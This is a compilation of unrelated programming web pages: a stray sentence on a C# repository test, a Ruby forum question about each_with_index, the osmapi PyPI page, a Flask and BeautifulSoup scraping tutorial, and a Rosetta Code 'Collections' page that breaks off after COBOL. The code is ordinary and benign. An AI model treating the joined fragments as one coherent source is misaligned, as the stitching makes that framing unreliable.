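A test could then construct new PersonRepository(new FakeRepository<Person>(), fakeUnitOfWork), seed it with Add, and exercise GetPerson without ever touching Entity Framework.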
http://geekswithblogs.net/danemorgridge/archive/2010/06/28/entity-framework-repository-amp-unit-of-work-t4-template-on.aspx
hello everybody!

i'm working on a program that has this piece of code:

def show_titles
  file = File.read("articles_file.txt")
  raw_articles = file.split("\n\n")
  raw_articles.each do |elem|
    title, *text = elem.split("\n")
    @array_of_splits << Article.new(title, text.join(" "))
  end
  @array_of_splits.each_with_index do |elem, index|
    puts "#{index}: #{elem.title}"
  end
end

the next thing i wanna do is to let the user pick a title through gets, and then the whole article must show up in the console. For example:

- Title 1
- Title 2
- Title 3

Pick the title of the article
gets = 2

Title 2
text 2 text 2...

The question is: how can i do that using each_with_index?

Thank u!
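One way to do this is to read the user's input with gets, convert it to an integer with to_i, and use that number to index the array whose positions were printed by each_with_index. A sketch follows; the Article struct here is a stand-in for the class in the question, which is assumed to respond to title and text:

```ruby
# Stand-in for the Article class from the question, so the sketch runs on its own
Article = Struct.new(:title, :text)

array_of_splits = [
  Article.new("Title 1", "text 1 text 1..."),
  Article.new("Title 2", "text 2 text 2..."),
  Article.new("Title 3", "text 3 text 3...")
]

# Same listing as in show_titles
array_of_splits.each_with_index do |elem, index|
  puts "#{index}: #{elem.title}"
end

puts "Pick the title of the article"
choice = gets.to_i              # e.g. the user types 2

article = array_of_splits[choice]
if article
  puts article.title
  puts article.text
else
  puts "No article with number #{choice}"
end
```

gets returns the typed line as a string (or nil at end of input), and to_i turns it into an array index; an out-of-range number makes the array lookup return nil, hence the check before printing.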
https://www.ruby-forum.com/t/each-with-index/196190
Python wrapper for the OSM API

Project description

Python wrapper for the OSM API

Installation

Install osmapi simply by using pip:

pip install osmapi

Documentation

The documentation is generated using pdoc and can be viewed online. To build the documentation locally, you can use

pdoc --html osmapi.OsmApi # create HTML file

This project uses GitHub Pages to publish its documentation. To update the online documentation, you need to re-generate the documentation with the above command and update the gh-pages branch of this repository.

Examples

Read from OpenStreetMap

import osmapi
api = osmapi.OsmApi()
print(api.NodeGet(123))
# {u'changeset': 532907, u'uid': 14298,
#  u'timestamp': u'2007-09-29T09:19:17Z',
#  u'lon': 10.790009299999999, u'visible': True,
#  u'version': 1, u'user': u'Mede',
#  u'lat': 59.9503044, u'tag': {}, u'id': 123}

Constructor

import osmapi
api = osmapi.OsmApi(api="api06.dev.openstreetmap.org", username="you", password="***")
api = osmapi.OsmApi(username="you", passwordfile="/etc/mypasswords")
api = osmapi.OsmApi(passwordfile="/etc/mypasswords")  # credentials are taken from the first line of the file

Note: The password file should have the format user:password

Write to OpenStreetMap

import osmapi
api = osmapi.OsmApi(username=u"metaodi", password=u"*******")
api.ChangesetCreate({u"comment": u"My first test"})
print(api.NodeCreate({u"lon": 1, u"lat": 1, u"tag": {}}))
# {u'changeset': 532907, u'lon': 1, u'version': 1, u'lat': 1, u'tag': {}, u'id': 164684}
api.ChangesetClose()

Note

Scripted imports and automated edits should only be carried out by those with experience and understanding of the way the OpenStreetMap community creates maps, and only with careful planning and consultation with the local community. See the Import/Guidelines and Automated Edits/Code of Conduct for more information.
Development

If you want to help with the development of osmapi, you should clone this repository and install the requirements:

pip install -r requirements.txt
pip install -r test-requirements.txt

After that, it is recommended to install the flake8 pre-commit hook:

flake8 --install-hook

Tests

To run the tests use the following command:

nosetests --verbose

By using tox you can even run the tests against different versions of Python (2.6, 2.7, 3.2 and 3.3):

tox

Attribution

This project was originally developed by Etienne Chove. This repository is a copy of the original code from SVN (), with the goal to enable easy contribution via GitHub and release of this package via PyPI. See also the OSM wiki:
https://pypi.org/project/osmapi/0.6.2/
Webscraping in Python with Flask and BeautifulSoup 4
Tanmay Naik

What is web scraping?
Web scraping is a term used for the process of extracting HTML/XML data from websites. Once extracted, it can be parsed into a different HTML file or saved locally in text/spreadsheet documents.

Who does it?
A lot of websites that aggregate data from other websites on the internet. Some examples could be websites that give you the best deals on the same product after comparing across multiple platforms (Amazon, Flipkart, eBay, etc.), and also sites that collect datasets to apply ML algorithms to.

How is it useful to me?
I would recommend you not to limit your thinking to how something could benefit you, especially when you know little to nothing about it. It helps to be a generalist when you're just starting out. Learn everything, you never know when you'll need it! You can always settle and specialize in one area eventually, when you're well aware of the options you have.

What we'll need
- Python v3.6.8
- VSCode

Installing Python (skip if already installed)
- Go to python.org > Downloads > Windows
- Scroll to version 3.6.8 > x86 (32 bit) / x86-64 (64 bit) > Executable
- Double-click and check "Add Python to PATH"
- Follow the installation instructions.
- Check if it is correctly installed: press Windows key+R, type "cmd" to open the command line, and in the command line type python --version
- If Python is installed correctly, you should see Python 3.6.8 in the terminal.

Installing VSCode (skip if already installed)
VSCode is a free code editor with lots of features that make writing and debugging code much easier.
- Go to code.visualstudio.com > Download for Windows > x86/x64 > Installer.
- Double-click and follow the instructions.

Let's begin!
- Create a new folder and call it "Webscraper" - Inside the folder, create a new file named webscraper.py - Open VSCode > File > Open Folder > Navigate to "Webscraper" Now we need to import a few libraries which will help us build our web scraper. - Go to Terminal > New Terminal This is basically the command line, but within the editor, so we don't have to keep two windows open and switch between them. - Next we call pip You could call it the Alfred to Python's Batman. Hehe. - In your terminal, type pip install beautifulsoup4 This installs the BeautifulSoup library, which will help us scrape webpages. - Next, type pip install flask and pip install requests Flask is a lightweight framework for building websites. We'll use it to parse our collected data and display it as HTML in a new HTML file. The requests module allows us to send HTTP requests to the website we want to scrape. In your file, type the following code: from flask import Flask, render_template from bs4 import BeautifulSoup import requests The first line imports the Flask class and the render_template method from the flask library. The second line imports the BeautifulSoup class, and the third line imports the requests module. Next, we declare a variable which will hold the result of our request: source = requests.get('').text We send a GET request to the site and convert the HTML to plain text, storing it in the source variable. Next, we declare a soup variable and store the value we get after passing source to BeautifulSoup. 'lxml' is the parser we want BeautifulSoup to use: soup = BeautifulSoup(source, 'lxml') At this point, we have our code working. You can check it by passing soup to a print function, like this: print(soup) after the previous line, and running python webscraper.py in the terminal. Right now, we are pulling the entire web page rather than specific elements on it. To get specific elements, you can try these by yourself.
But before you do that, you should be aware of what exactly you want to get. You can either run the last command again or open the web page in the browser and inspect it by right-clicking on the page. Some knowledge of the HTML DOM and CSS is required here. You can head over to W3Schools or MDN for a quick crash course on both. <variable> = soup.find('<HTML_element_name>') <variable> = soup.find('<HTML_element_name>').select_one('child_element') <variable> = soup.find('<HTML_element_name>').find_all('child_element') You can pass regular CSS notation in the brackets to be more specific about the elements you want. Right now, we are only outputting HTML along with the text inside it. What if we just want the text? That's easy. We simply add .text at the end, just like we did with source. Here's an example: head = soup.find('main').select_one('article:nth-of-type(4)').div.text Here, we tell Python to store the text of the div in the 4th article element, which is in the main element, in the head variable. You can check the output by passing head to print() and running python webscraper.py in the terminal. Try getting the name of one of the authors if you can. You can get an author like this: author = soup.find('main').select_one('p').text Notice how you also get the date along with the name. That's because both of them share the same element. There is a way to get the author name separately by using Python string methods like split and slice. But we won't cover that here. Next up, we will use Flask to re-render our received data the way we want on a local server.
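(A quick aside before the Flask part: the split-and-slice trick mentioned above can be sketched with plain Python strings. The sample value below is hypothetical; the real layout depends on what the shared element actually contains on your target page.)

```python
# Hypothetical combined text scraped from a <p> that holds both author and date
raw = "Tanmay Naik Jan 1, 2020"

words = raw.split()            # split on whitespace -> ['Tanmay', 'Naik', 'Jan', '1,', '2020']
author = " ".join(words[:2])   # slice off the first two words for the name
date = " ".join(words[2:])     # the rest is the date
print(author)  # Tanmay Naik
print(date)    # Jan 1, 2020
```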
In your file, type the following code: app = Flask(__name__) @app.route('/') def index(): return render_template('index.html', **locals()) app.run(debug=True) Create a new folder named templates inside your main Webscraper folder, and inside it create a file called index.html. The Flask part is a little complicated to explain, but to put it simply, we created a simple server that will take our index.html from the templates folder and serve it on a local server at http://localhost:5000 Now, we can combine multiple variables we declared in all the previous code using soup and pass the text to our HTML and use CSS to style them the way we want! You can use this code for the index.html file: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Webscraper in Python using Flask</title> </head> <body> <!-- Variables from Flask here --> </body> </html> Now, we can use all the code we learned so far to create custom variables and pull specific data from our site. If we are well versed with the structure of our target site, we can use shortcuts like these: head = soup.header.h1.text second_author = soup.main.select_one('article:nth-of-type(2)').p.text first_article = soup.main.article.div - Type these inside the index() function that we created, just above the return statement. - Save the file - Go to index.html Now we'll pass these variables into our HTML while it gets rendered, so we can see the data on our webpage. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Webscraper in Python using Flask</title> </head> <body> <h1>{{ head }}</h1> <p>{{ second_author }}</p> <article>{{ first_article }}</article> </body> </html> Now open the terminal and run python webscraper.py And we did it!
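One detail worth unpacking is the **locals() in the return statement: it hands every local variable of index() to the template by name, which is why placeholders like {{ head }} work in index.html. Jinja templating itself needs Flask installed, but the idea can be sketched with the stdlib string.Template (the page snippet and values below are made up for illustration):

```python
from string import Template

# Stand-in for templates/index.html; Jinja would write {{ head }} instead of $head
PAGE = Template("<h1>$head</h1>\n<p>$second_author</p>")

def index():
    # These play the role of the variables defined inside Flask's index()
    head = "A scraped heading"        # hypothetical value
    second_author = "A scraped name"  # hypothetical value
    # **locals() passes every local variable to the template by name
    return PAGE.substitute(**locals())

print(index())
```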
If you're wondering how it's so easy, well, it's not. This was just a single page, and a simple one at that, with no classes or IDs added to the HTML. But this is a good start. Wondering how you can scrape multiple pages? The answer is a combination of for and while loops, try/except blocks, and if-else conditions! Hello, this was my very first technical article. If you find any errors in the code or in the way I approached the tutorial, feel free to correct me. I'm excited to be part of this community as I grow with it, and I intend to contribute meaningful content. Thank you for reading!
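To make the multiple-pages idea concrete, here is a stdlib-only sketch of the loop structure: html.parser stands in for BeautifulSoup, and a pluggable fetch function stands in for requests.get(url).text, so nothing depends on a live site. The URLs and page contents below are made up:

```python
from html.parser import HTMLParser

class TitleParser(HTMLParser):
    """Collects the text inside every <h1> tag."""
    def __init__(self):
        super().__init__()
        self.in_h1 = False
        self.titles = []
    def handle_starttag(self, tag, attrs):
        if tag == "h1":
            self.in_h1 = True
    def handle_endtag(self, tag):
        if tag == "h1":
            self.in_h1 = False
    def handle_data(self, data):
        if self.in_h1:
            self.titles.append(data.strip())

def scrape_pages(urls, fetch):
    """Loop over pages; `fetch` maps a URL to its HTML text (e.g. requests.get(url).text)."""
    results = {}
    for url in urls:
        try:
            html = fetch(url)
        except (OSError, KeyError):
            continue  # skip pages that fail to load
        parser = TitleParser()
        parser.feed(html)
        results[url] = parser.titles
    return results

# Fake pages so the sketch runs offline; one URL is deliberately broken
pages = {
    "https://example.com/a": "<html><h1>Page A</h1></html>",
    "https://example.com/b": "<html><h1>Page B</h1></html>",
}
urls = list(pages) + ["https://example.com/missing"]
print(scrape_pages(urls, pages.__getitem__))
```

The try/except inside the for loop is exactly the "multiple for, while, try, except" pattern hinted at above: bad pages are skipped instead of crashing the whole run.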
https://dev.to/blazephoenix/webscraping-in-python-with-flask-and-beautifulsoup-4-1pkl
Collections You are encouraged to solve this task according to the task description, using any language you may know. Collections are abstractions to represent sets of values. In statically-typed languages, the values are typically of a common data type. - Task Create a collection, and add a few values to it. - See also - Array - Associative array: Creation, Iteration - Collections - Compound data type - Doubly-linked list: Definition, Element definition, Element insertion, Traversal Linked list - Queue: Definition, Usage - Set - Singly-linked list: Element definition, Element insertion, Traversal - Stack Contents - 1 ABAP - 2 Ada - 3 Aime - 4 ALGOL 68 - 5 Apex - 6 AutoHotkey - 7 AWK - 8 Axe - 9 BBC BASIC - 10 bc - 11 C - 12 C++ - 13 C# - 14 Clojure - 15 COBOL - 16 Common Lisp - 17 D - 18 E - 19 EchoLisp - 20 Elena - 21 Elixir - 22 Fancy - 23 Forth - 24 Fortran - 25 FreeBASIC - 26 Gambas - 27 Go - 28 Groovy - 29 Haskell - 30 Icon and Unicon - 31 J - 32 Java - 33 JavaScript - 34 jq - 35 Julia - 36 Kotlin - 37 Lingo - 38 Lisaac - 39 Logo - 40 Lua - 41 Maple - 42 Mathematica / Wolfram Language - 43 MATLAB / Octave - 44 NetRexx - 45 Nim - 46 Objeck - 47 Objective-C - 48 OCaml - 49 Oforth - 50 ooRexx - 51 Oz - 52 PARI/GP - 53 Pascal - 54 Perl - 55 Perl 6 - 56 Phix - 57 PHP - 58 PicoLisp - 59 PL/I - 60 PowerShell - 61 PureBasic - 62 Python - 63 R - 64 Racket - 65 Raven - 66 REXX - 67 Ring - 68 Ruby - 69 Rust - 70 Scala - 71 Scheme - 72 Seed7 - 73 Setl4 - 74 Sidef - 75 Slate - 76 Smalltalk - 77 Tcl - 78 TUSCRIPT - 79 UNIX Shell - 80 Ursala - 81 V - 82 Vim Script - 83 VBA - 84 Visual Basic .NET - 85 Visual FoxPro - 86 Wren - 87 zkl ABAP[edit] REPORT z_test_rosetta_collection. CLASS lcl_collection DEFINITION CREATE PUBLIC. PUBLIC SECTION. METHODS: start. ENDCLASS. CLASS lcl_collection IMPLEMENTATION. METHOD start. DATA(itab) = VALUE int4_table( ( 1 ) ( 2 ) ( 3 ) ). cl_demo_output=>display( itab ). ENDMETHOD. ENDCLASS. START-OF-SELECTION. NEW lcl_collection( )->start( ). 
Ada[edit] Ada 95 and earlier offers arrays. Ada 2005 adds the Ada.Containers package and its children. Examples of Doubly Linked Lists and Vectors are given. Ada 2005 also provides hashed and ordered Maps and Sets (not shown). anonymous arrays[edit] In Ada, arrays can be indexed on any range of discrete values. The example below creates an anonymous array indexed from -3 to -1. It initializes the three elements of the array at declaration. Then it reverses their order in the array. Anonymous arrays have no type associated with them that is accessible to the programmer. This means that anonymous arrays cannot be compared in the aggregate to other arrays (even those with the same index structure and contained type) or passed as a parameter to a subprogram. For these reasons, anonymous arrays are best used as singletons and global constants. procedure Array_Collection is A : array (-3 .. -1) of Integer := (1, 2, 3); begin A (-3) := 3; A (-2) := 2; A (-1) := 1; end Array_Collection; array types[edit] Because of the limitations of anonymous arrays noted above, arrays are more typically defined in Ada as array types, as in the example below. procedure Array_Collection is type Array_Type is array (1 .. 3) of Integer; A : Array_Type := (1, 2, 3); begin A (1) := 3; A (2) := 2; A (3) := 1; end Array_Collection; unconstrained arrays[edit] Dynamic arrays can be created through the use of pointers to unconstrained arrays. While an unconstrained array's index type is defined, it does not have a pre-defined range of indices - they are specified at the time of declaration or, as would be the case in a dynamic array, at the time the memory for the array is allocated. The creation of a dynamic array is not shown here, but below is an example declaration of an unconstrained array in Ada. procedure Array_Collection is type Array_Type is array (positive range <>) of Integer; -- may be indexed with any positive -- Integer value A : Array_Type(1 .. 
3); -- creates an array of three integers, indexed from 1 to 3 begin A (1) := 3; A (2) := 2; A (3) := 1; end Array_Collection; doubly linked lists[edit] with Ada.Containers.Doubly_Linked_Lists; use Ada.Containers; procedure Doubly_Linked_List is package DL_List_Pkg is new Doubly_Linked_Lists (Integer); use DL_List_Pkg; DL_List : List; begin DL_List.Append (1); DL_List.Append (2); DL_List.Append (3); end Doubly_Linked_List; vectors[edit] with Ada.Containers.Vectors; use Ada.Containers; procedure Vector_Example is package Vector_Pkg is new Vectors (Natural, Integer); use Vector_Pkg; V : Vector; begin V.Append (1); V.Append (2); V.Append (3); end Vector_Example; Aime[edit] Aime collections include "list"s (sequences) and "record"s (associative arrays). Both types of collections are heterogenous and resize dynamically. Lists[edit] Declaring a list: list l; Adding values to it: l_p_integer(l, 0, 7); l_push(l, "a string"); l_append(l, 2.5); Retrieving values from a list: l_query(l, 2) l_head(l) l_q_text(l, 1) l[3] Records[edit] Declaring a record: record r; Adding values to it: r_p_integer(r, "key1", 7); r_put(r, "key2", "a string"); r["key3"] = .25; Retrieving values from a record: r_query(r, "key1") r_tail(r) r["key2"] ALGOL 68[edit] Arrays are the closest thing to collections available as standard in Algol 68. Collections could be implemented using STRUCTs but there are none as standard. 
Some examples of arrays: # create a constant array of integers and set its values # []INT constant array = ( 1, 2, 3, 4 ); # create an array of integers that can be changed, note the size mst be specified # # this array has the default lower bound of 1 # [ 5 ]INT mutable array := ( 9, 8, 7, 6, 5 ); # modify the second element of the mutable array # mutable array[ 2 ] := -1; # array sizes are normally fixed when the array is created, however arrays can be # # declared to be FLEXible, allowing their sizes to change by assigning a new array to them # # The standard built-in STRING is notionally defined as FLEX[ 1 : 0 ]CHAR in the standard prelude # # Create a string variable: # STRING str := "abc"; # assign a longer value to it # str := "bbc/itv"; # add a few characters to str, +=: adds the text to the beginning, +:= adds it to the end # "[" +=: str; str +:= "]"; # str now contains "[bbc/itv]" # # Arrays of any type can be FLEXible: # # create an array of two integers # FLEX[ 1 : 2 ]INT fa := ( 0, 0 ); # replace it with a new array of 5 elements # fa := LOC[ -2 : 2 ]INT; Apex[edit] Lists[edit] A list is an ordered collection of elements that are distinguished by their indices Creating Lists // Create an empty list of String List<String> my_list = new List<String>(); // Create a nested list List<List<Set<Integer>>> my_list_2 = new List<List<Set<Integer>>>(); Access elements in a list List<Integer> myList = new List<Integer>(); // Define a new list myList.add(47); // Adds a second element of value 47 to the end // of the list Integer i = myList.get(0); // Retrieves the element at index 0 myList.set(0, 1); // Adds the integer 1 to the list at index 0 myList.clear(); // Removes all elements from the list Using Array Notation for One-dimensional list String[] colors = new List<String>(); List<String> colors = new String[1]; colors[0] = 'Green'; Sets[edit] A set is an unordered collection of elements that do not contain any duplicates. 
Defining a set: Set<String> s1 = new Set<String>{'a', 'b + c'}; // Defines a new set with two elements Set<String> s2 = new Set<String>(s1); // Defines a new set that contains the // elements of the set created in the previous step Access elements in a set: Set<Integer> s = new Set<Integer>(); // Define a new set s.add(1); // Add an element to the set System.assert(s.contains(1)); // Assert that the set contains an element s.remove(1); // Remove the element from the set Note the following limitations on sets: - Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a set in their declarations (for example, HashSet or TreeSet). Apex uses a hash structure for all sets. - A set is an unordered collection—you can’t access a set element at a specific index. You can only iterate over set elements. - The iteration order of set elements is deterministic, so you can rely on the order being the same in each subsequent execution of the same code. Maps[edit] A map is a collection of key-value pairs where each unique key maps to a single value Declaring a map: Map<String, String> country_currencies = new Map<String, String>(); Map<ID, Set<String>> m = new Map<ID, Set<String>>(); Map<String, String> MyStrings = new Map<String, String>{'a' => 'b', 'c' => 'd'.toUpperCase()}; Accessing a Map: Map<Integer, String> m = new Map<Integer, String>(); // Define a new map m.put(1, 'First entry'); // Insert a new key-value pair in the map m.put(2, 'Second entry'); // Insert a new key-value pair in the map System.assert(m.containsKey(1)); // Assert that the map contains a key String value = m.get(2); // Retrieve a value, given a particular key System.assertEquals('Second entry', value); Set<Integer> s = m.keySet(); // Return a set that contains all of the keys in the map Map Considerations: - Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a map in their declarations (for example, HashMap or TreeMap). 
Apex uses a hash structure for all maps. - The iteration order of map elements is deterministic. You can rely on the order being the same in each subsequent execution of the same code. However, we recommend to always access map elements by key. - A map key can hold. - Uniqueness of map keys of user-defined types is determined by the equals and hashCode methods, which you provide in your classes. Uniqueness of keys of all other non-primitive types, such as sObject keys, is determined by comparing the objects’ field values. - A Map object is serializable into JSON only if it uses one of the following data types as a key. Boolean, Date, DateTime, Decimal, Double, Enum, Id, Integer, Long, String, Time AutoHotkey[edit] Objects[edit] myCol := Object() mycol.mykey := "my value!" mycol["mykey"] := "new val!" MsgBox % mycol.mykey ; new val Pseudo-arrays[edit] Documentation: Loop 3 array%A_Index% := A_Index * 9 MsgBox % array1 " " array2 " " array3 ; 9 18 27 Structs[edit] Structs are not natively supported in AutoHotkey, however they are often required in DllCalls to C++ Dlls. This shows how to retrieve values from a RECT structure in AutoHotkey (from the DllCall documentation at)) AWK[edit] In awk, the closest thing to collections would be arrays. They are created when needed at assignment a[0]="hello" or by splitting a string split("one two three",a) Single elements are accessible with the bracket notation, like in C: print a[0] One can iterate over the elements of an array: for(i in a) print i":"a[i] Axe[edit] 1→{L₁} 2→{L₁+1} 3→{L₁+2} 4→{L₁+3} Disp {L₁}►Dec,i Disp {L₁+1}►Dec,i Disp {L₁+2}►Dec,i Disp {L₁+3}►Dec,i BBC BASIC[edit] Arrays[edit] In BBC BASIC the only native type of 'collection' is the array; the index starts at zero and the subscript specified in the DIM is the highest value of the index. Hence in this example an array with two elements is defined: DIM text$(1) text$(0) = "Hello " text$(1) = "world!" 
Arrays of structures[edit] When the objects in the collection are not simple scalar types an array of structures may be used: DIM collection{(1) name$, year%} collection{(0)}.name$ = "Richard" collection{(0)}.year% = 1952 collection{(1)}.name$ = "Sue" collection{(1)}.year% = 1950 Linked lists[edit] Although not a native language feature, other types of collections such as linked lists may be constructed: DIM node{name$, year%, link%} list% = 0 PROCadd(list%, node{}, "Richard", 1952) PROCadd(list%, node{}, "Sue", 1950) PROClist(list%, node{}) END DEF PROCadd(RETURN l%, c{}, n$, y%) LOCAL p% DIM p% DIM(c{})-1 !(^c{}+4) = p% c.name$ = n$ c.year% = y% c.link% = l% l% = p% ENDPROC DEF PROClist(l%, c{}) WHILE l% !(^c{}+4) = l% PRINT c.name$, c.year% l% = c.link% ENDWHILE ENDPROC bc[edit] See Arrays for basic operations on arrays, the only collection type in bc. C[edit] See Also foreach One thing in C language proper that can be said to be a collection is array type. An array has a length known at compile time. #define cSize( a ) ( sizeof(a)/sizeof(a[0]) ) /* a.size() */ int ar[10]; /* Collection<Integer> ar = new ArrayList<Integer>(10); */ ar[0] = 1; /* ar.set(0, 1); */ ar[1] = 2; int* p; /* Iterator<Integer> p; Integer pValue; */ for (p=ar; /* for( p = ar.itereator(), pValue=p.next(); */ p<(ar+cSize(ar)); /* p.hasNext(); */ p++) { /* pValue=p.next() ) { */ printf("%d\n",*p); /* System.out.println(pValue); */ } /* } */ Please note that c built-in pointer-arithmetic support which helps this logic. An integer may be 4 bytes, and a char 1 byte: the plus operator (+) is overloaded to multiply a incement by 4 for integer pointers and by 1 for char pointers (etc). Another construct which can be seen as a collection is a malloced array. The size of a malloced array is not known at compile time. 
int* ar; /* Collection<Integer> ar; */ int arSize; arSize = (rand() % 6) + 1; ar = calloc(arSize, sizeof(int) ); /* ar = new ArrayList<Integer>(arSize); */ ar[0] = 1; /* ar.set(0, 1); */ int* p; /* Iterator<Integer> p; Integer pValue; */ for (p=ar; /* p=ar.itereator(); for( pValue=p.next(); */ p<(ar+arSize); /* p.hasNext(); */ p++) { /* pValue=p.next() ) { */ printf("%d\n",*p); /* System.out.println(pValue); */ } /* } */ A string is another C language construct (when looked at with its standard libraries) that behaves like a collection. A C language string is an array of char, and it's size may or may not be known at compile time, however a c string is terminated with a ASCII NUL (which may be stated as a constant, '\0' or ((char)0) in the C language). The String standard library "class" has many "methods", however instead of being called String.method(), they are usually called strmethod(). Arbitrarily complex data structures can be constructed, normally via language features struct and pointers. They are everywhere, but not provided by the C language itself per se. C++[edit] C++ has a range of different collections optimized for different use cases. Note that in C++, objects of user-defined types are mostly treated just like objects of built-in types; especially there's no different treatment for collections. Thus all collections can simply be demonstrated with the built-in type int. For user-defined types, just replace int with the user-defined type. Any type which goes into a collection must be copyable and assignable (which in general is automatically the case unless you explicitly disallow it). Note however that C++ collections store copies of the objects given to them, so you'll lose any polymorphic behaviour. If you need polymorphism, use a collection of pointers (or smart pointers like boost::shared_ptr). built-in array[edit] The simplest collection in C++ is the built-in array. Built-in arrays have a fixed size, and except for POD types (i.e. 
basically any type you could also write in C), the members are all initialized at array creation time (if no explicit initialization is done, the default constructor is used). int a[5]; // array of 5 ints (since int is POD, the members are not initialized) a[0] = 1; // indexes start at 0 int primes[10] = { 2, 3, 5, 7, 11, 13, 17, 19, 23, 29 }; // arrays can be initialized on creation #include <string> std::string strings[4]; // std::string is not a POD type, therefore all array members are default-initialized // (for std::string this means initialized with empty strings) vector[edit] A vector is basically a resizable array. It is optimized for adding/removing elements on the end, and fast access to elements anywhere. Inserting elements at the beginning or in the middle is possible, but in general inefficient. #include <vector> std::vector<int> v; // empty vector v.push_back(5); // insert a 5 at the end v.insert(v.begin(), 7); // insert a 7 at the beginning deque[edit] A deque is optimized for appending and removing elements on both ends of the array. Accessing random elements is still efficient, but slightly less so than with vector. #include <deque> std::deque<int> d; // empty deque d.push_back(5); // insert a 5 at the end d.push_front(7); // insert a 7 at the beginning d.insert(d.begin()+1, 6); // insert a 6 in the middle list[edit] A list is optimized for insertion at an arbitrary place (provided you already have an iterator pointing to that place). Element access is efficient only in linear order. #include <list> std::list<int> l; // empty list l.push_back(5); // insert a 5 at the end l.push_front(7); // insert a 7 at the beginning std::list<int>::iterator i = l.begin(); ++i; l.insert(i, 6); // insert a 6 in the middle set[edit] A set keeps the inserted elements sorted, and also makes sure that each element occurs only once. Of course, if you want to put something into a set, it must be less-than-comparable, i.e.
you must be able to compare which of two objects a and b is smaller using a<b (there's also a way to define sets with a user-defined order, in which case this restriction doesn't apply). #include <set> std::set<int> s; // empty set s.insert(5); // insert a 5 s.insert(7); // insert a 7 (automatically placed after the 5) s.insert(5); // try to insert another 5 (will not change the set) multiset[edit] A multiset is like a set, except the same element may occur multiple times. #include <set> // std::multiset also lives in the <set> header std::multiset<int> m; // empty multiset m.insert(5); // insert a 5 m.insert(7); // insert a 7 (automatically placed after the 5) m.insert(5); // insert a second 5 (now m contains two 5s, followed by one 7) C#[edit] Arrays[edit] // Creates and initializes a new integer Array int[] intArray = new int[5] { 1, 2, 3, 4, 5 }; //same as int[] intArray = new int[]{ 1, 2, 3, 4, 5 }; //same as int[] intArray = { 1, 2, 3, 4, 5 }; //Arrays are zero-based string[] stringArr = new string[5]; stringArr[0] = "string"; ArrayList and List[edit] The size of an ArrayList is dynamically increased as required. ArrayLists are zero-based. //Create and initialize ArrayList ArrayList myAl = new ArrayList { "Hello", "World", "!" }; //Create ArrayList and add some values ArrayList myAL = new ArrayList(); myAL.Add("Hello"); myAL.Add("World"); myAL.Add("!"); The List class is the generic equivalent of the ArrayList class. A List is a strongly typed list of objects that can be accessed by index (zero-based again). //Create and initialize List List<string> myList = new List<string> { "Hello", "World", "!" }; //Create List and add some values List<string> myList2 = new List<string>(); myList2.Add("Hello"); myList2.Add("World"); myList2.Add("!"); Hashtable and Dictionary[edit] Hashtables represent a collection of key/value pairs that are organized based on the hash code of the key. Keys must be unique.
//Create and initialize Hashtable Hashtable myHt = new Hashtable() { { "Hello", "World" }, { "Key", "Value" } }; //Create Hashtable and add some Key-Value pairs. Hashtable myHt2 = new Hashtable(); myHt2.Add("Hello", "World"); myHt2.Add("Key", "Value"); Dictionary is a generic class. It represents a collection of key/value pairs. Keys must be unique. //Create and initialize Dictionary Dictionary<string, string> dict = new Dictionary<string, string>() { { "Hello", "World" }, { "Key", "Value" } }; //Create Dictionary and add some Key-Value pairs. Dictionary<string, string> dict2 = new Dictionary<string, string>(); dict2.Add("Hello", "World"); dict2.Add("Key", "Value"); Clojure[edit] Clojure's collections are immutable: rather than modifying an existing collection, you create a new collection based on a previous one but with changes, for example an additional element. Hash maps[edit] {1 "a", "Q" 10} ; commas are treated as whitespace (hash-map 1 "a" "Q" 10) ; equivalent to the above (let [my-map {1 "a"}] (assoc my-map "Q" 10)) ; "adding" an element Lists[edit] '(1 4 7) ; a linked list (list 1 4 7) (cons 1 (cons 4 '(7))) Vectors[edit] ['a 4 11] ; somewhere between array and list (vector 'a 4 11) (conj ['a 4] 11) ; vectors add at the *end* Sets[edit] #{:pig :dog :bear} (conj #{:pig :bear} :dog) (set [:pig :bear :dog]) COBOL[edit] COBOL is very much a fixed-length programming environment. Hierarchical fixed-length records are the main data grouping in many COBOL applications. Arrays are historically called tables in COBOL literature and are usually defined within a hierarchy. Tables are defined with the reserved word phrases OCCURS n TIMES, and OCCURS FROM n TO m TIMES DEPENDING ON x (commonly referred to as ODO for short). This example shows a small record layout inside a very small table. The last line of the output sample is a debug-enabled run-time bounds check abend, caused after the table is decreased in size.
The first run, without bounds check, runs to an erroneous completion; the second, with debug enabled, does not. identification division. program-id. collections. data division. working-storage section. 01 sample-table. 05 sample-record occurs 1 to 3 times depending on the-index. 10 sample-alpha pic x(4). 10 filler pic x value ":". 10 sample-number pic 9(4). 10 filler pic x value space. 77 the-index usage index. procedure division. collections-main. set the-index to 3 move 1234 to sample-number(1) move "abcd" to sample-alpha(1) move "test" to sample-alpha(2) move 6789 to sample-number(3) move "wxyz" to sample-alpha(3) display "sample-table : " sample-table display "sample-number(1): " sample-number(1) display "sample-record(2): " sample-record(2) display "sample-number(3): " sample-number(3) *> abend: out of bounds subscript, -debug turns on bounds check set the-index down by 1 display "sample-table : " sample-table display "sample-number(3): " sample-number(3) goback. end program collections. 
